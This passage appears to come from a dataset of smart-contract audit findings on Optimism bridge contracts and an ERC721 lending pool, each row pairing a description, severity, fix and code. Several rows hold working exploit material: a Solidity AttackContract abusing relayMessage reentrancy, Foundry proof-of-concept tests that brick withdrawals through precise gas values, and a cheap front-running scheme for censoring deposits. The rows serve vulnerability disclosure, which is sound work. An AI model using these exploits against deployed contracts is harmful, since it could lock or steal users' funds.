= new GasUser();\\n }\\n\\n function testGasLimitForGU() public {\\n gu.store{gas: 44_602}(1);\\n assert(gu.s(0) == 1);\\n }\\n\\n function _executePortalWithGivenGas(uint gas) public {\\n c.execute{gas: gas}(Portal.Transaction({\\n gasLimit: 44_602,\\n sender: address(69),\\n target: address(gu),\\n value: 0,\\n data: abi.encodeWithSignature(""store(uint256)"", 1)\\n }));\\n }\\n\\n function testPortalCatchesGasTooSmall() public {\\n vm.expectRevert(bytes(""OptimismPortal: insufficient gas to finalize withdrawal""));\\n _executePortalWithGivenGas(65681);\\n }\\n\\n function testPortalSucceedsWithEnoughGas() public {\\n _executePortalWithGivenGas(70803);\\n assert(gu.s(0) == 1);\\n }\\n\\n function testPortalBugWithInBetweenGasLow() public {\\n _executePortalWithGivenGas(65682);\\n \\n // It now reverts because the array has a length of 0.\\n vm.expectRevert();\\n gu.s(0);\\n }\\n\\n function testPortalBugWithInBetweenGasHigh() public {\\n _executePortalWithGivenGas(70802);\\n \\n // It now reverts because the array has a length of 0.\\n vm.expectRevert();\\n gu.s(0);\\n }\\n}\\n```\\n\\nSummarizing the results of this test:\\nWe verify that the call to the target contract succeeds with 44,602 gas, and set that as gasLimit for all tests.\\nWhen we send 65,681 or less gas, it's little enough to be caught by the require statement.\\nWhen we send 70,803 or more gas, the transaction will succeed.\\nWhen we send any amount of gas between these two values, the require check is passed but the transaction fails.","```\\nrequire(\\n gasleft() >= _tx.gasLimit + FINALIZE_GAS_BUFFER,\\n ""OptimismPortal: insufficient gas to finalize withdrawal""\\n);\\n```\\n" +Causing users lose their fund during finalizing withdrawal transaction,high,"A malicious user can make users lose their fund during finalizing their withdrawal. This is possible due to presence of reentrancy guard on the function `relayMessage`.\\nBob (a malicious user) creates a contract (called AttackContract) on L1.\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.0;\\n\\nstruct WithdrawalTransaction {\\n uint256 nonce;\\n address sender;\\n address target;\\n uint256 value;\\n uint256 gasLimit;\\n bytes data;\\n}\\n\\ninterface IOptimismPortal {\\n function finalizeWithdrawalTransaction(WithdrawalTransaction memory _tx)\\n external;\\n}\\n\\ncontract AttackContract {\\n bool public donotRevert;\\n bytes metaData;\\n address optimismPortalAddress;\\n\\n constructor(address _optimismPortal) {\\n optimismPortalAddress = _optimismPortal;\\n }\\n\\n function enableRevert() public {\\n donotRevert = true;\\n }\\n\\n function setMetaData(WithdrawalTransaction memory _tx) public {\\n metaData = abi.encodeWithSelector(\\n IOptimismPortal.finalizeWithdrawalTransaction.selector,\\n _tx\\n );\\n }\\n\\n function attack() public {\\n if (!donotRevert) {\\n revert();\\n } else {\\n optimismPortalAddress.call(metaData);\\n }\\n }\\n}\\n```\\n\\n```\\n if (!donotRevert) {\\n revert();\\n }\\n```\\n\\nThen, Bob calls the function `enableRevert` to set `donotRevert` to `true`. So that if later the function `attack()` is called again, it will not revert.\\n```\\n function enableRevert() public {\\n donotRevert = true;\\n }\\n```\\n\\nThen, Bob notices that Alice is withdrawing large amount of fund from L2 to L1. Her withdrawal transaction is proved but she is waiting for the challenge period to be finished to finalize it.\\nThen, Bob calls the function `setMetaData` on the contract `AttackContract` with the following parameter:\\n`_tx` = Alice's withdrawal transaction\\nBy doing so, the `metaData` will be equal to `finalizeWithdrawalTransaction.selector` + Alice's withdrawal transaction.\\n```\\n function setMetaData(WithdrawalTransaction memory _tx) public {\\n metaData = abi.encodeWithSelector(\\n IOptimismPortal.finalizeWithdrawalTransaction.selector,\\n _tx\\n );\\n }\\n```\\n\\nNow, after the challenge period is passed, and before the function `finalizeWithdrawalTransaction` is called by anyone (Alice), Bob calls the function `relayMessage` with the required data to retry his previous failed message again.\\nThis time, since `donotRevert` is `true`, the call to function `attack()` will not revert, instead the body of `else clause` will be executed.\\n```\\n else {\\n optimismPortalAddress.call(metaData);\\n }\\n```\\n\\nIn summary the attack is as follows:\\nBob creates a malicious contract on L1 called `AttackContract`.\\nBob sends a message from L2 to L1 to call the function `AttackContract.attack` on L1.\\nOn L1 side, after the challenge period is passed, the function `AttackContract.attack` will be called.\\nMessage relay on L1 will be unsuccessful, because the function `AttackContract.attack` reverts. So, Bob's message will be flagged as failed message.\\nBob sets `AttackContract.donotRevert` to true.\\nBob waits for an innocent user to request withdrawal transaction.\\nBob waits for the innocent user's withdrawal transaction to be proved.\\nBob sets meta data in his malicious contract based on the innocent user's withdrawal transaction.\\nBob waits for the challenge period to be passed.\\nAfter the challenge period is elapsed, Bob retries to relay his failed message again.\\n`CrossDomainMessenger.relayMessage` will call the `AttackContract.attack`, then it calls `OptimismPortal.finalizeWithdrawalTransaction` to finalize innocent user's withdrawal transaction. Then, it calls `CrossDomainMessenger.relayMessage`, but it will be unsuccessful because of reentrancy guard.\\nAfter finalizing the innocent user's withdrawal transaction, Bob's message will be flagged as successful.\\nSo, innocent user's withdrawal transaction is flagged as finalized, while it is not.","```\\n try IL1CrossDomainMessanger.relayMessage(// rest of code) {} catch Error(string memory reason) {\\n if (\\n keccak256(abi.encodePacked(reason)) ==\\n keccak256(abi.encodePacked(""ReentrancyGuard: reentrant call""))\\n ) {\\n revert(""finalizing should be reverted"");\\n }\\n }\\n```\\n","By doing this attack it is possible to prevent users from withdrawing their fund. Moreover, they lose their fund because withdrawal is flagged as finalized, but the withdrawal sent to `L1CrossDomainMessanger` was not successful.","```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.0;\\n\\nstruct WithdrawalTransaction {\\n uint256 nonce;\\n address sender;\\n address target;\\n uint256 value;\\n uint256 gasLimit;\\n bytes data;\\n}\\n\\ninterface IOptimismPortal {\\n function finalizeWithdrawalTransaction(WithdrawalTransaction memory _tx)\\n external;\\n}\\n\\ncontract AttackContract {\\n bool public donotRevert;\\n bytes metaData;\\n address optimismPortalAddress;\\n\\n constructor(address _optimismPortal) {\\n optimismPortalAddress = _optimismPortal;\\n }\\n\\n function enableRevert() public {\\n donotRevert = true;\\n }\\n\\n function setMetaData(WithdrawalTransaction memory _tx) public {\\n metaData = abi.encodeWithSelector(\\n IOptimismPortal.finalizeWithdrawalTransaction.selector,\\n _tx\\n );\\n }\\n\\n function attack() public {\\n if (!donotRevert) {\\n revert();\\n } else {\\n optimismPortalAddress.call(metaData);\\n }\\n }\\n}\\n```\\n" +Censorship resistance is undermined and bridging of assets can be DOSed at low cost,medium,"All L1->L2 transactions go through OptimismPortal's `depositTransaction` function. It is wrapped through the `metered` modifier. The goal is to create a gas market for L1->L2 transactions and not allow L1 TXs to fill up L2 batches (as the gas for deposit TX in L2 is payed for by the system), but the mechanism used makes it too inexpensive for a malicious user to DOS and censor deposits.\\nIt is possible for a malicious actor to snipe arbitrary L1->L2 transactions in the mempool for far too cheaply. This introduces two impacts:\\nUndermines censorship resistance guarantees by Optimism\\nGriefs users who simply want to bridge assets to L2\\nThe core issue is the check in ResourceMetering.sol:\\n```\\n// Make sure we can actually buy the resource amount requested by the user.\\nparams.prevBoughtGas += _amount;\\nrequire(\\n int256(uint256(params.prevBoughtGas)) <= MAX_RESOURCE_LIMIT,\\n ""ResourceMetering: cannot buy more gas than available gas limit""\\n);\\n```\\n\\nNote that `params.prevBoughtGas` is reset per block. This means attacker can view a TX in the mempool and wrap up the following flashbot bundle:\\nAttacker TX to `depositTransaction`, with gasLimit = 8M (MAX_RESOURCE_LIMIT)\\nVictim TX to `depositTransaction`\\nThe result is that attacker's transaction will execute and victim's TX would revert. It is unknown how this affects the UI and whether victim would be able to resubmit this TX again easily, but regardless it's clearly griefing user's attempt to bridge an asset. Note that a reverted TX is different from an uncompleted TX from a UX point of view.\\nFrom a censorship resistance perspective, there is nothing inherently preventing attack to continually use this technique to block out all TXs, albert gas metering price will rise as will be discussed.\\nNow we can demonstrate the cost of the attack to be low. Gas burned by the modifier is calculated as:\\n```\\n// Determine the amount of ETH to be paid.\\nuint256 resourceCost = _amount * params.prevBaseFee;\\n// rest of code\\nuint256 gasCost = resourceCost / Math.max(block.basefee, 1000000000);\\n```\\n\\n`params.prevBaseFee` is initialized at 1e9 and goes up per block by a factor of 1.375 when gas market is drained, while going down by 0.875 when gas market wasn't used at all.\\nIf we take the initial value, `resourceCost = 8e6 * 1e9 = 8e15`. If we assume tip is negligible to `block.basefee`, L1 gas cost in ETH equals `resourceCost` (divide by basefee and multiply by basefee). Therefore, cost of this snipe TX is:\\n`8e15 / 1e18 (ETH decimals) * 1600 (curr ETH price) = $12.80`\\nThe result is an extremely low price to pay, and even taking into account extra tips for frontrunning, is easily achievable.\\nIn practice `prevBaseFee` will represent the market price for L2 gas. If it goes lower than initial value, DOSing will become cheaper, while if it goes higher it will become more expensive. The key problem is that the attacker's cost is too similar to the victim's cost. If victim is trying to pass a 400k TX, attacker needs to buy a 7.6M of gas. This gap is too small and the resulting situation is that for DOS to be too expensive for attacker, TX would have to be far too expensive for the average user.","It is admittedly difficult to balance the need for censorship resistance with the prevention of L2 flooding via L1 TXs. However, the current solution which will make a victim's TX revert at hacker's will is inadequate and will lead to severe UX issues for users.",Censorship resistance is undermined and bridging of assets can be DOSed at low cost.,"```\\n// Make sure we can actually buy the resource amount requested by the user.\\nparams.prevBoughtGas += _amount;\\nrequire(\\n int256(uint256(params.prevBoughtGas)) <= MAX_RESOURCE_LIMIT,\\n ""ResourceMetering: cannot buy more gas than available gas limit""\\n);\\n```\\n" +[High] Function MigrateWithdrawal() may set gas limit so high for old withdrawals when migrating them by mistake and they can't be relayed in the L1 and users funds would be lost,medium,"Function `MigrateWithdrawal()` in migrate.go will turn a LegacyWithdrawal into a bedrock style Withdrawal. it should set a min gas limit value for the withdrawals. to calculate a gas limit contract overestimates it and if the value goes higher than L1 maximum gas in the block then the withdraw can't be relayed in the L1 and users funds would be lost while the withdraw could be possible before the migration it won't be possible after it.\\nThis is `MigrateWithdrawal()` code:\\n```\\n// MigrateWithdrawal will turn a LegacyWithdrawal into a bedrock\\n// style Withdrawal.\\nfunc MigrateWithdrawal(withdrawal *LegacyWithdrawal, l1CrossDomainMessenger *common.Address) (*Withdrawal, error) {\\n // Attempt to parse the value\\n value, err := withdrawal.Value()\\n if err != nil {\\n return nil, fmt.Errorf(""cannot migrate withdrawal: %w"", err)\\n }\\n\\n abi, err := bindings.L1CrossDomainMessengerMetaData.GetAbi()\\n if err != nil {\\n return nil, err\\n }\\n\\n // Migrated withdrawals are specified as version 0. Both the\\n // L2ToL1MessagePasser and the CrossDomainMessenger use the same\\n // versioning scheme. Both should be set to version 0\\n versionedNonce := EncodeVersionedNonce(withdrawal.Nonce, new(big.Int))\\n // Encode the call to `relayMessage` on the `CrossDomainMessenger`.\\n // The minGasLimit can safely be 0 here.\\n data, err := abi.Pack(\\n ""relayMessage"",\\n versionedNonce,\\n withdrawal.Sender,\\n withdrawal.Target,\\n value,\\n new(big.Int),\\n withdrawal.Data,\\n )\\n if err != nil {\\n return nil, fmt.Errorf(""cannot abi encode relayMessage: %w"", err)\\n }\\n\\n // Set the outer gas limit. This cannot be zero\\n gasLimit := uint64(len(data)*16 + 200_000)\\n\\n w := NewWithdrawal(\\n versionedNonce,\\n &predeploys.L2CrossDomainMessengerAddr,\\n l1CrossDomainMessenger,\\n value,\\n new(big.Int).SetUint64(gasLimit),\\n data,\\n )\\n return w, nil\\n}\\n```\\n\\nAs you can see it sets the gas limit as `gasLimit := uint64(len(data)*16 + 200_000)` and contract set 16 gas per data byte but in Ethereum when data byte is 0 then the overhead intrinsic gas is 4 and contract overestimate the gas limit by setting 16 gas for each data. this can cause messages with big data(which calculated gas is higher than 30M) to not be relay able in the L1 because if transaction gas set lower than calculated gas then OptimisimPortal would reject it and if gas set higher than calculated gas then miners would reject the transaction. while if code correctly estimated the required gas the gas limit could be lower by the factor of 4. for example a message with about 2M zeros would get gas limit higher than 30M and it won't be withdrawable in the L1 while the real gas limit is 8M which is relayable.","calculate gas estimation correctly, 4 for 0 bytes and 16 for none zero bytes.",some withdraw messages from L2 to L1 that could be relayed before the migration can't be relayed after the migration because of the wrong gas estimation.,"```\\n// MigrateWithdrawal will turn a LegacyWithdrawal into a bedrock\\n// style Withdrawal.\\nfunc MigrateWithdrawal(withdrawal *LegacyWithdrawal, l1CrossDomainMessenger *common.Address) (*Withdrawal, error) {\\n // Attempt to parse the value\\n value, err := withdrawal.Value()\\n if err != nil {\\n return nil, fmt.Errorf(""cannot migrate withdrawal: %w"", err)\\n }\\n\\n abi, err := bindings.L1CrossDomainMessengerMetaData.GetAbi()\\n if err != nil {\\n return nil, err\\n }\\n\\n // Migrated withdrawals are specified as version 0. Both the\\n // L2ToL1MessagePasser and the CrossDomainMessenger use the same\\n // versioning scheme. Both should be set to version 0\\n versionedNonce := EncodeVersionedNonce(withdrawal.Nonce, new(big.Int))\\n // Encode the call to `relayMessage` on the `CrossDomainMessenger`.\\n // The minGasLimit can safely be 0 here.\\n data, err := abi.Pack(\\n ""relayMessage"",\\n versionedNonce,\\n withdrawal.Sender,\\n withdrawal.Target,\\n value,\\n new(big.Int),\\n withdrawal.Data,\\n )\\n if err != nil {\\n return nil, fmt.Errorf(""cannot abi encode relayMessage: %w"", err)\\n }\\n\\n // Set the outer gas limit. This cannot be zero\\n gasLimit := uint64(len(data)*16 + 200_000)\\n\\n w := NewWithdrawal(\\n versionedNonce,\\n &predeploys.L2CrossDomainMessengerAddr,\\n l1CrossDomainMessenger,\\n value,\\n new(big.Int).SetUint64(gasLimit),\\n data,\\n )\\n return w, nil\\n}\\n```\\n" +Migration can be bricked by sending a message directly to the LegacyMessagePasser,medium,"The migration process halts and returns an error if any of the withdrawal data breaks from the specified format. However, the data for this migration comes from every call that has been made to the LegacyMessagePasser (0x00) address, and it is possible to send a transaction that would violate the requirements. The result is that the migration process would be bricked and need to be rebuilt, with some difficult technical challenges that we'll outline below.\\nWithdrawal data is saved in l2geth whenever a call is made to the LegacyMessagePasser address:\\n```\\nif addr == dump.MessagePasserAddress {\\n statedumper.WriteMessage(caller.Address(), input)\\n}\\n```\\n\\nThis will save all the calls that came via the L2CrossDomainMessenger. The expected format for the data is encoded in the L2CrossDomainMessenger. It encodes the calldata to be executed on the L1 side as: `abi.encodeWithSignature(""relayMessage(...)"", target, sender, message, nonce)`\\nThe migration process expects the calldata to follow this format, and expects the call to come from L2CrossDomainMessenger, implemented with the following two checks:\\n```\\nselector := crypto.Keccak256([]byte(""relayMessage(address,address,bytes,uint256)""))[0:4]\\nif !bytes.Equal(data[0:4], selector) {\\n return fmt.Errorf(""invalid selector: 0x%x"", data[0:4])\\n}\\n\\nmsgSender := data[len(data)-len(predeploys.L2CrossDomainMessengerAddr):]\\nif !bytes.Equal(msgSender, predeploys.L2CrossDomainMessengerAddr.Bytes()) {\\n return errors.New(""invalid msg.sender"")\\n}\\n```\\n\\nThe migration process will be exited and the migration will fail if this assumption is violated.\\nHowever, since the function on the LegacyMessagePasser is public, it can also be called directly with arbitrary calldata:\\n```\\nfunction passMessageToL1(bytes memory _message) external {\\n sentMessages[keccak256(abi.encodePacked(_message, msg.sender))] = true;\\n}\\n```\\n\\nThis allows us to submit calldata that would violate both of these checks and cause the migration to panic and fail.\\nWhile it may seem easy to filter these withdrawals out and rerun the migration, this solution would not work either. That's because, later in the process, we check that easy storage slot in the LegacyMessagePasser contract has a corresponding withdrawal in the migration:\\n```\\nfor slot := range slotsAct {\\n _, ok := slotsInp[slot]\\n if !ok {\\n return nil, fmt.Errorf(""unknown storage slot in state: %s"", slot)\\n }\\n}\\n```\\n\\nThe result is that the Optimism team would need to unwind the migration, develop a new migration process to account for this issue, and remigrate with an untested system.","Rather than throwing an error if withdrawal data doesn't meet the requirements, save a list of these withdrawals and continue. Include this list when prechecking withdrawals to ensure that they are included in the storage slot matching process, but not included in withdrawals to be transferred to the new system.\\nSpecial note\\nAfter coming up with this attack, we've noticed that someone has done exactly what we described and sent a message directly to the MessagePasser! Obviously this TX has nothing to do with us and we want to make sure Optimism is absolutely safe during migration. Furthermore, this TX should be traced and if a contestant is linked to this then they should clearly be disqualified from being rewarded.","Exploitation of this bug would lead to significant challenges for the Optimism team, needing to run a less tested migration process (which could lead to further issues), and a significant amount of FUD in pausing a partially completed migration partway through. We think that the ability to unexpectedly shut down the migration causes enough structural damage as well as second-order financial damage to warrant high severity.","```\\nif addr == dump.MessagePasserAddress {\\n statedumper.WriteMessage(caller.Address(), input)\\n}\\n```\\n" +"Withdrawals with high gas limits can be bricked by a malicious user, permanently locking funds",high,"Transactions to execute a withdrawal from the Optimism Portal require the caller to send enough gas to cover `gasLimit` specified by the withdrawer.\\nBecause the EVM limits the total gas forwarded on to 63/64ths of the total `gasleft()` (and silently reduces it to this value if we try to send more) there are situations where transactions with high gas limits will be vulnerable to being reverted.\\nBecause there are no replays on this contract, the result is that a malicious user can call `finalizeWithdrawalTransaction()` with a precise amount of gas, cause the withdrawer's withdrawal to fail, and permanently lock their funds.\\nWithdrawals can be withdrawn from L2's `L2ToL1MessagePasser` contract to L1's `OptimismPortal` contract. This is a less ""user-friendly"" withdrawal path, presumably for users who know what they are doing.\\nOne of the quirks of the `OptimismPortal` is that there is no replaying of transactions. If a transaction fails, it will simply fail, and all ETH associated with it will remain in the `OptimismPortal` contract. Users have been warned of this and understand the risks, so Optimism takes no responsibility for user error.\\nIn order to ensure that failed transactions can only happen at the fault of the user, the contract implements a check to ensure that the gasLimit is sufficient:\\n```\\nrequire(\\n gasleft() >= _tx.gasLimit + FINALIZE_GAS_BUFFER,\\n ""OptimismPortal: insufficient gas to finalize withdrawal""\\n);\\n```\\n\\nWhen the transaction is executed, the contract requests to send along all the remaining gas, minus the hardcoded `FINALIZE_GAS_BUFFER` for actions after the call. The goal is that this will ensure that the amount of gas forwarded on is at least the gas limit specified by the user.\\nOptimism is aware of the importance of this property being correct when they write in the comments:\\n“We want to maintain the property that the amount of gas supplied to the call to the target contract is at least the gas limit specified by the user. We can do this by enforcing that, at this point in time, we still have gaslimit + buffer gas available.”\\nThe issue is that the EVM specifies the maximum gas that can be sent to an external call as 63/64ths of the `gasleft()`. For very large gas limits, this 1/64th that remains could be greater than the hardcoded FINALIZE_GAS_BUFFER value. In this case, less gas would be forwarded along than was directed by the contract.\\nHere is a quick overview of the math:\\nWe need X gas to be sent as a part of the call.\\nThis means we need `X * 64 / 63` gas to be available at the time the function is called.\\nHowever, the only check is that we have `X + 20_000` gas a few operations prior to the call (which guarantees that we have `X + 14878` at the time of the call).\\nFor any situation where `X / 64 > 14878` (in other words, when the amount of gas sent is greater than 952_192), the caller is able to send an amount of gas that passes the check, but doesn't forward the required amount on in the call.","Change the check to account for this 63/64 rule:\\n```\\nrequire(\\n gasleft() >= (_tx.gasLimit + FINALIZE_GAS_BUFFER) * 64 / 63,\\n ""OptimismPortal: insufficient gas to finalize withdrawal""\\n);\\n```\\n","For any withdrawal with a gas limit of at least 952,192, a malicious user can call `finalizeWithdrawalTransaction()` with an amount of gas that will pass the checks, but will end up forwarding along less gas than was specified by the user.\\nThe result is that the withdrawing user can have their funds permanently locked in the `OptimismPortal` contract.\\nProof of Concept\\nTo test this behavior in a sandboxed environment, you can copy the following proof of concept.\\nHere are three simple contracts that replicate the behavior of the Portal, as well as an external contract that uses a predefined amount of gas.\\n(Note that we added 5122 to the gas included in the call to correct for the other bug we submitted, as this issue remains even when the other bug is patched.)\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.13;\\n\\nlibrary SafeCall {\\n /**\\n * @notice Perform a low level call without copying any returndata\\n *\\n * @param _target Address to call\\n * @param _gas Amount of gas to pass to the call\\n * @param _value Amount of value to pass to the call\\n * @param _calldata Calldata to pass to the call\\n */\\n function call(\\n address _target,\\n uint256 _gas,\\n uint256 _value,\\n bytes memory _calldata\\n ) internal returns (bool) {\\n bool _success;\\n assembly {\\n _success := call(\\n _gas, // gas\\n _target, // recipient\\n _value, // ether value\\n add(_calldata, 0x20), // inloc\\n mload(_calldata), // inlen\\n 0, // outloc\\n 0 // outlen\\n )\\n }\\n return _success;\\n }\\n}\\n\\ncontract GasUser {\\n uint[] public s;\\n\\n function store(uint i) public {\\n for (uint j = 0; j < i; j++) {\\n s.push(1);\\n }\\n }\\n}\\n\\ncontract Portal {\\n address l2Sender;\\n\\n struct Transaction {\\n uint gasLimit;\\n address sender;\\n address target;\\n uint value;\\n bytes data;\\n }\\n\\n constructor(address _l2Sender) {\\n l2Sender = _l2Sender;\\n }\\n\\n function execute(Transaction memory _tx) public {\\n require(\\n gasleft() >= _tx.gasLimit + 20000,\\n ""OptimismPortal: insufficient gas to finalize withdrawal""\\n );\\n\\n // Set the l2Sender so contracts know who triggered this withdrawal on L2.\\n l2Sender = _tx.sender;\\n\\n // Trigger the call to the target contract. We use SafeCall because we don't\\n // care about the returndata and we don't want target contracts to be able to force this\\n // call to run out of gas via a returndata bomb.\\n bool success = SafeCall.call(\\n _tx.target,\\n gasleft() - 20000 + 5122, // fix for other bug\\n _tx.value,\\n _tx.data\\n );\\n }\\n}\\n```\\n\\nHere is a Foundry test that calls the Portal with various gas values to expose this vulnerability:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.13;\\n\\nimport ""forge-std/Test.sol"";\\nimport ""../src/Portal.sol"";\\n\\ncontract PortalGasTest is Test {\\n Portal public c;\\n GasUser public gu;\\n\\n function setUp() public {\\n c = new Portal(0x000000000000000000000000000000000000dEaD);\\n gu = new GasUser();\\n }\\n\\n function testGasLimitForGU() public {\\n gu.store{gas: 11_245_655}(500);\\n assert(gu.s(499) == 1);\\n }\\n\\n function _executePortalWithGivenGas(uint gas) public {\\n c.execute{gas: gas}(Portal.Transaction({\\n gasLimit: 11_245_655,\\n sender: address(69),\\n target: address(gu),\\n value: 0,\\n data: abi.encodeWithSignature(""store(uint256)"", 500)\\n }));\\n }\\n\\n function testPortalCatchesGasTooSmall() public {\\n vm.expectRevert(bytes(""OptimismPortal: insufficient gas to finalize withdrawal""));\\n _executePortalWithGivenGas(11_266_734);\\n }\\n\\n function testPortalSucceedsWithEnoughGas() public {\\n _executePortalWithGivenGas(11_433_180);\\n assert(gu.s(499) == 1);\\n }\\n\\n function testPortalBugWithInBetweenGasLow() public {\\n _executePortalWithGivenGas(11_266_735);\\n \\n // It now reverts because the array has a length of 0.\\n vm.expectRevert();\\n gu.s(0);\\n }\\n\\n function testPortalBugWithInBetweenGasHigh() public {\\n _executePortalWithGivenGas(11_433_179);\\n \\n // It now reverts because the array has a length of 0.\\n vm.expectRevert();\\n gu.s(0);\\n }\\n}\\n```\\n\\nAs you can see:\\nWe verify that the call to the target contract succeeds with 11,245,655 gas, and set that as gasLimit for all tests. This is the `X` from our formula above.\\nThis means that we need `11_245_655 * 64 / 63 = 11_424_157` gas available at the time the call is made.\\nThe test uses `9023` gas before it makes our call, so we can see that if we send `11_424_157 + 9_023 = 11_433_180` gas, the test passes.\\nSimilarly, if we send `11_266_734` gas, the total gas will be small enough to fail the require check.\\nBut in the sweet spot between these values, we have enough gas to pass the require check, but when we get to the call, the amount of gas requested is more than 63/64ths of the total, so the EVM sends less than we asked for. As a result, the transaction fails.","```\\nrequire(\\n gasleft() >= _tx.gasLimit + FINALIZE_GAS_BUFFER,\\n ""OptimismPortal: insufficient gas to finalize withdrawal""\\n);\\n```\\n" +Challenger can override the 7 day finalization period,medium,"All withdrawals are finalized after a 7 days window (finalization period). After this duration transaction are confirmed and user can surely withdraw their balance. But due to lack of check, challenger can delete a l2Output which is older than 7 days meaning withdrawals will stop working for even confirmed transaction\\nProposer has proposed L2 output for a _l2BlockNumber which creates entries on l2Outputs using the proposeL2Output. Assume this creates a new l2Output at index X\\n```\\nl2Outputs.push(\\n Types.OutputProposal({\\n outputRoot: _outputRoot,\\n timestamp: uint128(block.timestamp),\\n l2BlockNumber: uint128(_l2BlockNumber)\\n })\\n );\\n```\\n\\nproveWithdrawalTransaction has been called for user linked to this l2Output\\nFinalization period(7 day) is over after proposal and Users is ready to call `finalizeWithdrawalTransaction` to withdraw their funds\\nSince confirmation is done, User A is sure that he will be able to withdraw and thinks to do it after coming back from his holidays\\nChallenger tries to delete the index X (Step 1), ideally it should not be allowed as already confirmed. But since there is no such timeline check so the l2Output gets deleted\\n```\\nfunction deleteL2Outputs(uint256 _l2OutputIndex) external {\\n require(\\n msg.sender == CHALLENGER,\\n ""L2OutputOracle: only the challenger address can delete outputs""\\n );\\n\\n // Make sure we're not *increasing* the length of the array.\\n require(\\n _l2OutputIndex < l2Outputs.length,\\n ""L2OutputOracle: cannot delete outputs after the latest output index""\\n );\\n\\n uint256 prevNextL2OutputIndex = nextOutputIndex();\\n\\n // Use assembly to delete the array elements because Solidity doesn't allow it.\\n assembly {\\n sstore(l2Outputs.slot, _l2OutputIndex)\\n }\\n\\n emit OutputsDeleted(prevNextL2OutputIndex, _l2OutputIndex);\\n }\\n```\\n\\nUser comes back and now tries to withdraw but the withdraw fails since the l2Output index X does not exist anymore. This is incorrect and nullifies the network guarantee.\\nNote: In case of a separate output root could be proven then user withdrawal will permanently stuck. Ideally if such anomaly could not be caught within finalization period then user should be allowed to withdraw","Add below check in\\n```\\nrequire(getL2Output(_l2OutputIndex).timestamp<=FINALIZATION_PERIOD_SECONDS, ""Output already confirmed"");\\n```\\n",Withdrawal will fail for confirmed transaction,"```\\nl2Outputs.push(\\n Types.OutputProposal({\\n outputRoot: _outputRoot,\\n timestamp: uint128(block.timestamp),\\n l2BlockNumber: uint128(_l2BlockNumber)\\n })\\n );\\n```\\n" +user can drawDebt that is below dust amount,medium,"According to the protocol, drawDebt prevents user from drawing below the `quoteDust_` amount. However, a logical error in the code can allow user to draw below dust amount.\\n`_revertOnMinDebt` is used in `drawDebt` to prevent dust loans. As you can see, the protocol wants to take the average of debt in the pool and make it the minimum if there are 10 or more loans. If it is lower than 10 loans, a `quoteDust` is used as the minimum. There is an edge case, whereby there are 10 loans in the pool, and the borrowers repay the loans till there is only 1 unit owed for each loan.(Might revert due to rounding error but it is describing a situation whereby repaying till a low amount of poolDebt can enable this). A new borrower can then `drawDebt` and because `_revertOnMindebt` only goes through the average loan amount check and not the `quoteDust_` amount check, he/she is able to draw loan that is well below the `quoteDust_` amount.\\n```\\n function _revertOnMinDebt(\\n LoansState storage loans_,\\n uint256 poolDebt_,\\n uint256 borrowerDebt_,\\n uint256 quoteDust_\\n ) view {\\n if (borrowerDebt_ != 0) {\\n uint256 loansCount = Loans.noOfLoans(loans_);\\n if (loansCount >= 10) {\\n if (borrowerDebt_ < _minDebtAmount(poolDebt_, loansCount)) revert AmountLTMinDebt();\\n } else {\\n if (borrowerDebt_ < quoteDust_) revert DustAmountNotExceeded();\\n }\\n }\\n }\\n```\\n\\n```\\n function _minDebtAmount(\\n uint256 debt_,\\n uint256 loansCount_\\n ) pure returns (uint256 minDebtAmount_) {\\n if (loansCount_ != 0) {\\n minDebtAmount_ = Maths.wdiv(Maths.wdiv(debt_, Maths.wad(loansCount_)), 10**19);\\n }\\n }\\n```\\n","Issue user can drawDebt that is below dust amount\\nRecommend checking that loan amount is more than `quoteDust_` regardless of the loan count.\\n```\\n function _revertOnMinDebt(\\n LoansState storage loans_,\\n uint256 poolDebt_,\\n uint256 borrowerDebt_,\\n uint256 quoteDust_\\n ) view {\\n if (borrowerDebt_ != 0) {\\n uint256 loansCount = Loans.noOfLoans(loans_);\\n if (loansCount >= 10) {\\n if (borrowerDebt_ < _minDebtAmount(poolDebt_, loansCount)) revert AmountLTMinDebt();\\n } \\n if (borrowerDebt_ < quoteDust_) revert DustAmountNotExceeded();\\n \\n }\\n }\\n```\\n","A minimum loan amount is used to deter dust loans, which can diminish user experience.","```\\n function _revertOnMinDebt(\\n LoansState storage loans_,\\n uint256 poolDebt_,\\n uint256 borrowerDebt_,\\n uint256 quoteDust_\\n ) view {\\n if (borrowerDebt_ != 0) {\\n uint256 loansCount = Loans.noOfLoans(loans_);\\n if (loansCount >= 10) {\\n if (borrowerDebt_ < _minDebtAmount(poolDebt_, loansCount)) revert AmountLTMinDebt();\\n } else {\\n if (borrowerDebt_ < quoteDust_) revert DustAmountNotExceeded();\\n }\\n }\\n }\\n```\\n" +"CryptoKitty and CryptoFighter NFT can be paused, which block borrowing / repaying / liquidating action in the ERC721Pool when borrowers still forced to pay the compounding interest",medium,"CryptoKitty and CryptoFighter NFT can be paused, which block borrowing / repaying / liquidating action in the ERC721Pool\\nIn the current implementation in the factory contract and the pool contract, special logic is in-place to handle non-standard NFT such as crypto-kitty, crypto-figher or crypto punk.\\nIn the factory contract:\\n```\\nNFTTypes nftType;\\n// CryptoPunks NFTs\\nif (collateral_ == 0xb47e3cd837dDF8e4c57F05d70Ab865de6e193BBB ) {\\n nftType = NFTTypes.CRYPTOPUNKS;\\n}\\n// CryptoKitties and CryptoFighters NFTs\\nelse if (collateral_ == 0x06012c8cf97BEaD5deAe237070F9587f8E7A266d || collateral_ == 0x87d598064c736dd0C712D329aFCFAA0Ccc1921A1) {\\n nftType = NFTTypes.CRYPTOKITTIES;\\n}\\n// All other NFTs that support the EIP721 standard\\nelse {\\n // Here 0x80ac58cd is the ERC721 interface Id\\n // Neither a standard NFT nor a non-standard supported NFT(punk, kitty or fighter)\\n try IERC165(collateral_).supportsInterface(0x80ac58cd) returns (bool supportsERC721Interface) {\\n if (!supportsERC721Interface) revert NFTNotSupported();\\n } catch {\\n revert NFTNotSupported();\\n }\\n\\n nftType = NFTTypes.STANDARD_ERC721;\\n}\\n```\\n\\nAnd in ERC721Pool When handling ERC721 token transfer:\\n```\\n/**\\n * @notice Helper function for transferring multiple NFT tokens from msg.sender to pool.\\n * @notice Reverts in case token id is not supported by subset pool.\\n * @param poolTokens_ Array in pool that tracks NFT ids (could be tracking NFTs pledged by borrower or NFTs added by a lender in a specific 